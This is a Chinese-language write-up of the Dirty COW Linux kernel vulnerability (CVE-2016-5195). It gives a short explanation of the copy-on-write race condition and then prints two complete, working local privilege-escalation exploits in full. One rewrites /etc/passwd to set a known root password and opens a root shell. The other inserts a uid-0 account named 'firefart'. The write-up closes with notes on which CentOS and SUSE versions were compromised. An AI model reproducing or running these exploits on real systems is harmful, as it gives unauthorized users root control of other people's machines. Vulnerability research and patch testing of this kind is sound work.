一、脏牛漏洞描述
漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复
二、漏洞利用原理
该漏洞具体为,Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.)
竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。
三、漏洞测试
github Pocs页面为:https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
经测试上面提供的exp代码可用,这里使用其中两段测试代码:
exp1:
#include <iostream> #include <fstream> #include <string> #include <thread> #include <sys/mman.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <pwd.h> #include <pty.h> #include <string.h> #include <termios.h> #include <sys/wait.h> #include <signal.h> #define BUFFSIZE 1024 #define DEFSLTIME 300000 #define PWDFILE "/etc/passwd" #define BAKFILE "./.ssh_bak" #define TMPBAKFILE "/tmp/.ssh_bak" #define PSM "/proc/self/mem" #define ROOTID "root:" #define SSHDID "sshd:" #define MAXITER 300 #define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/" #define TXTPWD "dirtyCowFun\n" #define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n" #define EXITCMD "exit\n" #define CPCMD "\\cp " #define RMCMD "\\rm " using namespace std; class Dcow{ private: bool run, rawMode, opShell, restPwd; void *map; int fd, iter, master, wstat; string buffer, etcPwd, etcPwdBak, root, user, pwd, sshd; thread *writerThr, *madviseThr, *checkerThr; ifstream *extPwd; ofstream *extPwdBak; struct passwd *userId; pid_t child; char buffv[BUFFSIZE]; fd_set rfds; struct termios termOld, termNew; ssize_t ign; void exitOnError(string msg); public: Dcow(bool opSh, bool rstPwd); ~Dcow(void); int expl(void); }; Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd), iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr), madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), child(0){ userId = getpwuid(getuid()); user.append(userId->pw_name).append(":"); extPwd = new ifstream(PWDFILE); while (getline(*extPwd, buffer)){ buffer.append("\n"); etcPwdBak.append(buffer); if(buffer.find(root) == 0){ etcPwd.insert(0, root).insert(root.size(), pwd); etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), buffer.begin() + buffer.find(":", root.size()), buffer.end()); }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){ etcPwd.insert(0, buffer); }else{ etcPwd.append(buffer); } } extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE); extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size()); extPwdBak->close(); fd = open(PWDFILE,O_RDONLY); map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0); } Dcow::~Dcow(void){ extPwd->close(); close(fd); delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr; if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld); if(child != 0) wait(&wstat); } void Dcow::exitOnError(string msg){ cerr << msg << endl; throw new exception(); } int Dcow::expl(void){ madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} }); writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); } }); checkerThr = new thread([&](){ while(iter <= MAXITER){ extPwd->clear(); extPwd->seekg(0, ios::beg); buffer.assign(istreambuf_iterator<char>(*extPwd), istreambuf_iterator<char>()); if(buffer.find(pwd) != string::npos && buffer.size() >= etcPwdBak.size()){ run = false; break; } iter ++; usleep(DEFSLTIME); } run = false; }); cerr << "Running ..." << endl; madviseThr->join(); writerThr->join(); checkerThr->join(); if(iter <= MAXITER){ child = forkpty(&master, nullptr, nullptr, nullptr); if(child == -1) exitOnError("Error forking pty."); if(child == 0){ execlp("su", "su", "-", nullptr); exitOnError("Error on exec."); } if(opShell) cerr << "Password overridden to: " << TXTPWD << endl; memset(buffv, 0, BUFFSIZE); ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1); if(bytes_read <= 0) exitOnError("Error reading su prompt."); cerr << "Received su prompt (" << buffv << ")" << endl; if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) exitOnError("Error writing pwd on tty."); if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) exitOnError("Error writing cmd on tty."); if(!opShell){ if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) exitOnError("Error writing exit cmd on tty."); }else{ if(restPwd){ string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n"); if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) exitOnError("Error writing restore cmd on tty."); restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n"); if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) exitOnError("Error writing restore cmd (rm) on tty."); } if(tcgetattr(STDIN_FILENO, &termOld) == -1 ) exitOnError("Error getting terminal attributes."); termNew = termOld; termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO)); if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1) exitOnError("Error setting terminal in non-canonical mode."); rawMode = true; while(true){ FD_ZERO(&rfds); FD_SET(master, &rfds); FD_SET(STDIN_FILENO, &rfds); if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 ) exitOnError("Error on select tty."); if(FD_ISSET(master, &rfds)) { memset(buffv, 0, BUFFSIZE); bytes_read = read(master, buffv, BUFFSIZE - 1); if(bytes_read <= 0) break; if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read) exitOnError("Error writing on stdout."); } if(FD_ISSET(STDIN_FILENO, &rfds)) { memset(buffv, 0, BUFFSIZE); bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1); if(bytes_read <= 0) exitOnError("Error reading from stdin."); if(write(master, buffv, bytes_read) != bytes_read) break; } } } } return [](int ret, bool shell){ string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n"; if(ret <= MAXITER){cerr << msg; return 0;} else{cerr << "Exploit failed.\n"; return 1;} }(iter, opShell); } void printInfo(char* cmd){ cerr << cmd << " [-s] [-n] | [-h]\n" << endl; cerr << " -s open directly a shell, if the exploit is successful;" << endl; cerr << " -n combined with -s, doesn't restore the passwd file." << endl; cerr << " -h print this synopsis;" << endl; cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl; cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl; cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl; exit(1); } int main(int argc, char** argv){ const char flags[] = "shn"; int c; bool opShell = false, restPwd = argc != 1 ? true : false; opterr = 0; while ((c = getopt(argc, argv, flags)) != -1){ switch (c){ case 's': opShell = true; break; case 'n': restPwd = false; break; case 'h': printInfo(argv[0]); break; default: cerr << "Invalid parameter." << endl << endl; printInfo(argv[0]); } } if(!restPwd && !opShell && argc != 1){ cerr << "Invalid parameter: -n requires -s" << endl << endl; printInfo(argv[0]); } Dcow dcow(opShell, restPwd); return dcow.expl(); }
测试结果如下:
exp2:
// This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automatically generates a new passwd line. // The user will be prompted for the new password when the binary is run. // The original /etc/passwd file is then backed up to /tmp/passwd.bak // and overwrites the root account with the generated line. // After running the exploit you should be able to login with the newly // created user. // // To use this exploit modify the user values according to your needs. // The default is "firefart". // // Original exploit (dirtycow's ptrace_pokedata "pokemon" method): // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c // // Compile with: // gcc -pthread dirty.c -o dirty -lcrypt // // Then run the newly create binary by either doing: // "./dirty" or "./dirty my-new-password" // // Afterwards, you can either "su firefart" or "ssh firefart@..." // // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! // mv /tmp/passwd.bak /etc/passwd // // Exploit adopted by Christian "FireFart" Mehlmauer // https://firefart.at // #include <fcntl.h> #include <pthread.h> #include <string.h> #include <stdio.h> #include <stdint.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <stdlib.h> #include <unistd.h> #include <crypt.h> const char *filename = "/etc/passwd"; const char *backup_filename = "/tmp/passwd.bak"; const char *salt = "firefart"; int f; void *map; pid_t pid; pthread_t pth; struct stat st; struct Userinfo { char *username; char *hash; int user_id; int group_id; char *info; char *home_dir; char *shell; }; char *generate_password_hash(char *plaintext_pw) { return crypt(plaintext_pw, salt); } char *generate_passwd_line(struct Userinfo u) { const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; int size = snprintf(NULL, 0, format, u.username, u.hash, u.user_id, u.group_id, u.info, u.home_dir, u.shell); char *ret = malloc(size + 1); sprintf(ret, format, u.username, u.hash, u.user_id, u.group_id, u.info, u.home_dir, u.shell); return ret; } void *madviseThread(void *arg) { int i, c = 0; for(i = 0; i < 200000000; i++) { c += madvise(map, 100, MADV_DONTNEED); } printf("madvise %d\n\n", c); } int copy_file(const char *from, const char *to) { // check if target file already exists if(access(to, F_OK) != -1) { printf("File %s already exists! Please delete it and run again\n", to); return -1; } char ch; FILE *source, *target; source = fopen(from, "r"); if(source == NULL) { return -1; } target = fopen(to, "w"); if(target == NULL) { fclose(source); return -1; } while((ch = fgetc(source)) != EOF) { fputc(ch, target); } printf("%s successfully backed up to %s\n", from, to); fclose(source); fclose(target); return 0; } int main(int argc, char *argv[]) { // backup file int ret = copy_file(filename, backup_filename); if (ret != 0) { exit(ret); } struct Userinfo user; // set values, change as needed user.username = "firefart"; user.user_id = 0; user.group_id = 0; user.info = "pwned"; user.home_dir = "/root"; user.shell = "/bin/bash"; char *plaintext_pw; if (argc >= 2) { plaintext_pw = argv[1]; printf("Please enter the new password: %s\n", plaintext_pw); } else { plaintext_pw = getpass("Please enter the new password: "); } user.hash = generate_password_hash(plaintext_pw); char *complete_passwd_line = generate_passwd_line(user); printf("Complete line:\n%s\n", complete_passwd_line); f = open(filename, O_RDONLY); fstat(f, &st); map = mmap(NULL, st.st_size + sizeof(long), PROT_READ, MAP_PRIVATE, f, 0); printf("mmap: %lx\n",(unsigned long)map); pid = fork(); if(pid) { waitpid(pid, NULL, 0); int u, i, o, c = 0; int l=strlen(complete_passwd_line); for(i = 0; i < 10000/l; i++) { for(o = 0; o < l; o++) { for(u = 0; u < 10000; u++) { c += ptrace(PTRACE_POKETEXT, pid, map + o, *((long*)(complete_passwd_line + o))); } } } printf("ptrace %d\n",c); } else { pthread_create(&pth, NULL, madviseThread, NULL); ptrace(PTRACE_TRACEME); kill(getpid(), SIGSTOP); pthread_join(pth,NULL); } printf("Done! Check %s to see if the new user was created.\n", filename); printf("You can log in with the username '%s' and the password '%s'.\n\n", user.username, plaintext_pw); printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", backup_filename, filename); return 0; }
由于gcc版本的原因,exp1在很多版本上编译会出错,所以这里有使用了exp2进行测试,具体结果如下:
参数页面:
更详细的关于漏洞原理的部分可以参考如下页面:
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
根据测试结果centos7.2以下的版本基本都可以测试成功,SUSE11全部版本都可以成功。